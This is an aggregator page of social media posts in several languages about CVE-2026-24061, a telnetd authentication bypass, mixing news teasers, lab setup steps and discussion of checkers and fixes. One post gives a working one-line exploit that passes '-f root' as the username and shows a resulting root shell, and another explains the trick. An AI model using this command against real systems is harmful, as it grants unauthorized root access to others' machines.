home.social

#telnetd — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #telnetd, aggregated by home.social.

  1. Krytyczna podatność w telnetd

    Początkowo informacja na temat wykrycia (kolejnej) podatności w Telnetd przeszła bez echa. Wszak Telnet to bardzo stary protokół. Niska popularność rozwiązania może tłumaczyć, dlaczego problem początkowo nie wzbudził większego zainteresowania… TLDR: Telnet to rozwiązanie, które swoje największe triumfy święciło w czasach, kiedy nikomu jeszcze nie śnił się powszechny dostęp do...

    #WBiegu #Linemode #Podatność #Telnet #Telnetd #Vulnerability

    sekurak.pl/krytyczna-podatnosc

  2. Krytyczna podatność w telnetd

    Początkowo informacja na temat wykrycia (kolejnej) podatności w Telnetd przeszła bez echa. Wszak Telnet to bardzo stary protokół. Niska popularność rozwiązania może tłumaczyć, dlaczego problem początkowo nie wzbudził większego zainteresowania… TLDR: Telnet to rozwiązanie, które swoje największe triumfy święciło w czasach, kiedy nikomu jeszcze nie śnił się powszechny dostęp do...

    #WBiegu #Linemode #Podatność #Telnet #Telnetd #Vulnerability

    sekurak.pl/krytyczna-podatnosc

  3. Krytyczna podatność w telnetd

    Początkowo informacja na temat wykrycia (kolejnej) podatności w Telnetd przeszła bez echa. Wszak Telnet to bardzo stary protokół. Niska popularność rozwiązania może tłumaczyć, dlaczego problem początkowo nie wzbudził większego zainteresowania… TLDR: Telnet to rozwiązanie, które swoje największe triumfy święciło w czasach, kiedy nikomu jeszcze nie śnił się powszechny dostęp do...

    #WBiegu #Linemode #Podatność #Telnet #Telnetd #Vulnerability

    sekurak.pl/krytyczna-podatnosc

  4. Krytyczna podatność w telnetd

    Początkowo informacja na temat wykrycia (kolejnej) podatności w Telnetd przeszła bez echa. Wszak Telnet to bardzo stary protokół. Niska popularność rozwiązania może tłumaczyć, dlaczego problem początkowo nie wzbudził większego zainteresowania… TLDR: Telnet to rozwiązanie, które swoje największe triumfy święciło w czasach, kiedy nikomu jeszcze nie śnił się powszechny dostęp do...

    #WBiegu #Linemode #Podatność #Telnet #Telnetd #Vulnerability

    sekurak.pl/krytyczna-podatnosc

  5. Krytyczna podatność w telnetd

    Początkowo informacja na temat wykrycia (kolejnej) podatności w Telnetd przeszła bez echa. Wszak Telnet to bardzo stary protokół. Niska popularność rozwiązania może tłumaczyć, dlaczego problem początkowo nie wzbudził większego zainteresowania… TLDR: Telnet to rozwiązanie, które swoje największe triumfy święciło w czasach, kiedy nikomu jeszcze nie śnił się powszechny dostęp do...

    #WBiegu #Linemode #Podatność #Telnet #Telnetd #Vulnerability

    sekurak.pl/krytyczna-podatnosc

  6. Warning: computer nerd stuff below:

    So. In 2026, telnet is still a thing.
    Really? 😑

    ubuntu@ubuntu:~$ USER=“-f root” telnet -a victim.ip.address

    [usual Ubuntu /etc/issue text]

    root@ubuntu:~# id
    uid=0(root) gid=0(root) groups=0(root)

    You’re welcome.

    #itsecurity #unix #linux #telnet #telnetd

  7. Security Week 2605: тривиальная ошибка в telnetd

    20 января разработчик Саймон Йозефссон опубликовал в рассылке oss-sec информацию о крайне серьезной уязвимости в демоне telnetd, реализующем удаленное подключение по протоколу telnet. В традиционной для описания уязвимости терминологии суть проблемы заключается в следующем: «ошибка в обработке входящих данных позволяет злоумышленнику пропустить процесс аутентификации и получить на подверженной уязвимости системе права суперпользователя». Применение таких терминов обычно обозначает, что подлинное описание проблемы либо слишком длинное, либо слишком сложное для понимания, но в данном случае это не так. При подключении к telnetd нужно указать имя пользователя. Его программа передает стандартной утилите login , причем передача осуществляется без предварительной проверки ввода от желающего подключиться. Если указать вместо имени пользователя строку «-f root», эти данные будут переданы в утилиту login, а она уже залогинит любого желающего под рутом без какой-либо авторизации, увидев соответствующий ключ -f. Собственно, это вся уязвимость как есть.

    habr.com/ru/companies/kaspersk

    #иб #telnetd

  8. I've successfully tested the PoC in the #SafeBreach Labs GitHub repository. It seems like a good place to start to write a checker (if there isn't a good one).

    github.com/SafeBreach-Labs/CVE

    #CVE_2026_24061 #telnetd #vulnerability

  9. Any good, legitimate checker around for CVE-2026-24061 ?

    Exploitation is trivial, checking for the vulnerability, not so much.

    #CVE_2026_24061 #telnetd #vulnerability

  10. vagrant init debian/bookworm64
    vagrant up
    vagrant ssh

    sudo bash
    apt update
    apt install inetutils-telnetd=2:2.4-2+deb12u1 inetutils-telnet=2:2.4-2+deb12u1
    1. Edit /etc/inetd.conf to enable telnetd
    2. systemctl restart inetutils-inetd
    3. Check telnet is running (ss -tupln | grep :23)

    Congratulations, you got yourself a system vulnerable to CVE-2026-24061 !

    #CVE_2026_24061 #telnetd #vulnerability

  11. Here I am installing #telnetd on Debian in the laboratory... To test CVE-2026-24061.

    #CVE_2026_24061

  12. 2.7までのGNU inetutilsに含まれるtelnetdに、細工した環境変数を送信するだけで認証を回避して特権ユーザーでのログインが可能な脆弱性が発見されたらしい。CVE-2026-24061。いまどきtelnetdをThe Internetに露出している人はそうそういないはずとはいえ、なかなか興味深いので調べてみたところ。`telnetd`が`execv()`で呼び出す`/usr/bin/login`のコマンドラインオプションをうまく使うことでそういうことができてしまうようで、正直興奮した。

    safebreach.com/blog/safebreach

    #CVE #GNU #inetutils #login #telnetd #サイバーセキュリティ #セキュリティ #情報セキュリティ #脆弱性

  13. I wonder how many IoT appliances, abandoned by its vendor, can now be liberated thanks to the recent telnetd-bug.

    #telnetd #telnet #telnetgate

  14. @ska

    Looking at the commit and the code as it still stands today, it is interesting that only on Solaris does it even try to use -- in the arguments to login to signal the end of options, and even then only in limited circumstances.

    #FreeBSD telnetd, for comparison, always puts -- in before the supplied account name.

    I wonder how long it will be before the lesson is properly learned.

    @jas
    #getopt #login #telnetd #inetutils